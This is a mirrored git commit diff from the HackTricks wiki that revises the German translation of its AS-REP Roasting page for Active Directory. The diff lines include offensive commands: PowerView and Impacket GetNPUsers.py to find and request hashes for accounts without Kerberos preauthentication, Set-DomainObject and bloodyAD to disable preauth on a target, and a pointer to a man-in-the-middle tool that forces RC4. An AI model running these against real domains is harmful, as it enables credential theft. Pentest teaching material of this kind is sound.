mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
		
							parent
							
								
									659351eeb2
								
							
						
					
					
						commit
						3769033097
					
				@ -12,7 +12,7 @@ Die Hauptanforderungen für diesen Angriff sind:
 | 
			
		||||
- **Verbindung zum Domain Controller (DC)**: Angreifer benötigen Zugriff auf den DC, um Anfragen zu senden und verschlüsselte Nachrichten zu empfangen.
 | 
			
		||||
- **Optionales Domänenkonto**: Ein Domänenkonto ermöglicht es Angreifern, anfällige Benutzer effizienter durch LDAP-Abfragen zu identifizieren. Ohne ein solches Konto müssen Angreifer Benutzernamen erraten.
 | 
			
		||||
 | 
			
		||||
#### Auflisten anfälliger Benutzer (benötigt Domänenanmeldeinformationen)
 | 
			
		||||
#### Auflisten anfälliger Benutzer (benötigen Domänenanmeldeinformationen)
 | 
			
		||||
```bash:Using Windows
 | 
			
		||||
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 | 
			
		||||
```
 | 
			
		||||
@ -33,7 +33,7 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
 | 
			
		||||
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 | 
			
		||||
```
 | 
			
		||||
> [!WARNING]
 | 
			
		||||
> AS-REP Roasting mit Rubeus wird eine 4768 mit einem Verschlüsselungstyp von 0x17 und einem Preauth-Typ von 0 generieren.
 | 
			
		||||
> AS-REP Roasting mit Rubeus wird eine 4768 mit einem Verschlüsselungstyp von 0x17 und einem Preauth-Typ von 0 erzeugen.
 | 
			
		||||
 | 
			
		||||
### Knacken
 | 
			
		||||
```bash
 | 
			
		||||
@ -48,11 +48,11 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
```bash:Using Linux
 | 
			
		||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
 | 
			
		||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
 | 
			
		||||
```
 | 
			
		||||
## ASREProast ohne Anmeldeinformationen
 | 
			
		||||
 | 
			
		||||
Ein Angreifer kann eine Man-in-the-Middle-Position nutzen, um AS-REP-Pakete abzufangen, während sie das Netzwerk durchqueren, ohne sich darauf zu verlassen, dass die Kerberos-Vorautorisierung deaktiviert ist. Es funktioniert daher für alle Benutzer im VLAN.\
 | 
			
		||||
Ein Angreifer kann eine Man-in-the-Middle-Position nutzen, um AS-REP-Pakete abzufangen, während sie das Netzwerk durchqueren, ohne sich auf die Deaktivierung der Kerberos-Vorautorisierung zu verlassen. Es funktioniert daher für alle Benutzer im VLAN.\
 | 
			
		||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) ermöglicht uns dies. Darüber hinaus zwingt das Tool Client-Workstations, RC4 zu verwenden, indem es die Kerberos-Verhandlung ändert.
 | 
			
		||||
```bash
 | 
			
		||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 | 
			
		||||
 | 
			
		||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user